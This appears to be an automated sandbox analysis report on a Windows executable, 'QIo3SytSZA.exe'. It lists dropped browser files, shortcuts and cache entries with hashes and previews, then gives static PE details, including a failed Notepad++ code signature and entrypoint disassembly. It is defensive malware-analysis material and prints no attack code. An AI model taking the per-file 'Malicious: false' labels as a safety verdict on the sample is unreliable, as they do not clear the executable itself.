Preview:	'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4882)
Category:	dropped
Size (bytes):	130866
Entropy (8bit):	5.425065147784983
Encrypted:	false
SSDEEP:	1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
MD5:	1A8A1F4E5BA291867D4FA8EF94243EFA
SHA1:	B25076D2AE85BD5E4ABA935F758D5122CCB82C36
SHA-256:	441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
SHA-512:	F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\d2d8a8bd-0c48-4d33-b8f9-53b45b8cee82.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	154477
Entropy (8bit):	7.835886983924039
Encrypted:	false
SSDEEP:	3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
MD5:	14937B985303ECCE4196154A24FC369A
SHA1:	ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
SHA-256:	71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
SHA-512:	1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...\|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.\|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,\|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 19:09:01 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9849318045135425
Encrypted:	false
SSDEEP:	48:8bcdRTcFXH5idAKZdA1P4ehwiZUklqehLy+3:8OoFDO0y
MD5:	4F4B2E12A6E3F9DFDD36A0C2C3BE52F4
SHA1:	515266A514965DAD4239727FC526F1A8FAFA894C
SHA-256:	9D612AD1C8E184AEB0E4B36BC7F1B334046AA9B6305E6D389428A992F6AEDBF7
SHA-512:	ED1FC883B502B2A24A8EACC1E9BB86D3C813323FC81D5E09A2F31063010E1E37FB21BE3BA4AB7FC0546CB9F9F06A1CF80CF60A0217E2922CBA4CAEEF41E42A8F
Malicious:	false
Preview:	L..................F.@.. ...$+.,....)...Q....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y......B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y......M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y...............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y!............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 19:09:01 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.001173801510798
Encrypted:	false
SSDEEP:	48:8qdRTcFXH5idAKZdA1+4eh/iZUkAQkqehky+2:80oFSF9QVy
MD5:	85AE59F70C722349ECF9FCF476DA3777
SHA1:	555CD1A777F3223CB012FE419356CB939CD69A54
SHA-256:	0D37D08511ADEFAF3F5AE69A9ACB660EDB0E233EACDD3630281D154E5174A20F
SHA-512:	20E08896C635BEDFBC72E8EF869E14F8D8D3B7EF91F23A243F3D45302B140F685D43FB2368461BB2C4C017DF530055A0095675DB8A976FCF5807113C27247F1E
Malicious:	false
Preview:	L..................F.@.. ...$+.,....R...Q....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y......B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y......M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y...............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y!............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.005929837945717
Encrypted:	false
SSDEEP:	48:8/dRTcVH5idAKZdA1404eh7sFiZUkmgqeh7s+y+BX:8/o9Inoy
MD5:	CE1E2C544760C8F1FE723BA43553CD8D
SHA1:	E1CEAB8A930CD7B4A115D6EE6AD990962F991D9D
SHA-256:	1A3B09D99DA92DAE0E9A1B74F156E952BE225E8086D909E3118D03C3BC57232B
SHA-512:	DE2CE06436874D58B0E8E3EF8569736C4D18739A6A32B92A5897D5F3C692E6F357A41F1ADD5A49CFEEB32DC421C34BEA367D31EBD11A2B6A81082CF7F205A092
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....<}.i.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y......B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y......M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y...............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.F...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 19:09:00 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9997042001705028
Encrypted:	false
SSDEEP:	48:8qdRTcFXH5idAKZdA1p4ehDiZUkwqehAy+R:80oFl52y
MD5:	A3F2E929D7E6E735687328D2B8EFC1DE
SHA1:	EF767FEFDFE67F666E70FDCEDC444E0DFF16F43D
SHA-256:	4830CA20F36C8478EE408EFB2B37A8BA782AB8B07F52A6B342B536ED4FFE36CC
SHA-512:	39417C6CED69F508450656C6117BBF2FF8E392680038B9B557D76857DB8A8DDECFB3A4B9C3F86534D337FDD6C6D15D77ADDD0E3D1AF354C72C70F1C5759E1BD6
Malicious:	false
Preview:	L..................F.@.. ...$+.,.........Q....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y......B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y......M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y...............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y!............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 19:09:01 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.990213194393055
Encrypted:	false
SSDEEP:	48:8kdRTcFXH5idAKZdA1X4ehBiZUk1W1qehyy+C:8CoFbb9Sy
MD5:	D4FB04346A6CAE1D3549FA47203B7E76
SHA1:	4519C39A3DA75F49B25E6FA18C1F217DCA97A574
SHA-256:	A34F3F59DD70362729CBFE9ABE4C62861882C318A6087AB79BDC8D3FE8D5CB42
SHA-512:	5CE884D4EE5F1A17BC19582BAB02A3627FC1EDFC9BDE2A0579CA71F5A397F81033E6B8AC359C033D3DD8EBE809C0BA8140F323293B1D5332E98FF68E554AAFC2
Malicious:	false
Preview:	L..................F.@.. ...$+.,........Q....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y......B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y......M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y...............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y!............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 19:09:00 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9970446895833147
Encrypted:	false
SSDEEP:	48:8bdRTcFXH5idAKZdA1duTc4ehOuTbbiZUk5OjqehOuTboy+yT+:8DoFUTcJTbxWOvTboy7T
MD5:	E237590D5F623D7E1D070EDB6B6041C5
SHA1:	EB47AD85D81D551FCDD7CCC8A97CF0E5D38F431A
SHA-256:	21FEEB2B57918B8103858F4CCC5CA35B2B60FF750D01811B84EAB6BCC422CA8D
SHA-512:	BB10ACF74CF7452F6C162882AC47392378E521C92E0C3684F4FC357A35208CAE52B112F3D76722F30AA389D26E1E0CE0E24B17C43ED3C2E671E28B1C44B5809F
Malicious:	false
Preview:	L..................F.@.. ...$+.,.........Q....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y......B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y......M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y...............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y!............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 442

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (835)
Category:	downloaded
Size (bytes):	840
Entropy (8bit):	5.186925283278743
Encrypted:	false
SSDEEP:	24:iOEuCMwnjVpkyWGBHslgT9lCuABAT4tSuoB7HHHHHHHYqmffffffo:YMkjd9KlgZ01BAjuSEqmffffffo
MD5:	E7CCD5A6E28A6A98ADAC49643F7914FE
SHA1:	D3C2E45B3B1CD93412DE0E6306B56DED0C6308EF
SHA-256:	51D3C575FF228B7312F0D0912FCA09FB0B21A1399732052BFE98809CE5FF4B5C
SHA-512:	692C1D503796DD49A10105A9FA25800106A5A06F81BD88A83027FBF2CEBFFA3792AC500A24CF0374E867A098C309EC061FD2B5245AF44BF6162BB0440D7E3C9B
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["helldivers killzone crossover","anthony santander yankees","honda nissan merger talks","earthquake port vila vanuatu","soto fire jurupa valley","national film registry movies","poe 2 patch notes","holiday baking championship season 11"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":9100816750800277996,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 443

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 444

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132723
Entropy (8bit):	5.436732785321107
Encrypted:	false
SSDEEP:	3072:f3kJQ7O4N5dTm+syHEt4W3XdQ4Q6QuSr/nUW2i6o:fiQ7HTt/sHdQ4Q6QDfUW8o
MD5:	D764A55746C4B0347F3880B16BE56B79
SHA1:	C436B6B2677D7A22143F4B412818731792951591
SHA-256:	9B636150B78931FBF07DE9C195778CD1F3C853B1A2847458C0B1DCA160427205
SHA-512:	19C0187CA33F4A4060090249D8BECE1A55C83ED57706C9B0F6059FC38F0E7A6B45F5DA8AEA1E82ED4F6906F76AE27F0FECD798FCC50640ED0483AECB1D138A0D
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.973262299759636
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	QIo3SytSZA.exe
File size:	884'502 bytes
MD5:	1f4548aac2c166bacd286c6f5243908f
SHA1:	4f1aa4c962860e6c80c626c367ce60b87fc62022
SHA256:	023b8573a4295c5f78f6e89b13062e5c185d74e57d2b1c8ec066393bba87313a
SHA512:	889bb965859ef077ced15d0f15e4c75b743726582841b72b9634f958749671325965a1ee99c680d72db1b19a5b05a4868b7017baa73c7b88673a96689e32ce93
SSDEEP:	24576:wy0fEYxFMyNiAX1dwhCEcAXWnKu4UaOa1/lLD:3AjP1dwhCVvnKXUaOU/lLD
TLSH:	1B152383DF6484EBFBAA49B028B8D226CD7B36552454D27A630C960D7E143C1DEB8377
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

File Icon


Icon Hash:	febeecf8e4f83280

Static PE Info

General

Entrypoint:	0x4038af
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/05/2022 01:00:00 15/05/2025 00:59:59
Subject Chain	CN="Notepad++", O="Notepad++", L=Saint Cloud, S=Ile-de-France, C=FR
Version:	3
Thumbprint MD5:	15E2254C8FC88D4A538BA4FB09C0019E
Thumbprint SHA-1:	A731D48CD8E2A99BB91F7C096F40CEDF3A468BA6
Thumbprint SHA-256:	866B46DC0876C0B9C85AFE6569E49352A021C255C8E7680DF6AC1FDBAD677033
Serial:	03AA6492DE9D96A90A4BCA97BEADB44A

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007F349CB080CBh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007F349CB07DADh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007F349CB07D9Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007F349CB0569Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007F349CB07A71h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F349CB05723h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F349CB0569Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac40	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x100000	0x8752	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd55be	0x2958	.ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x994	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
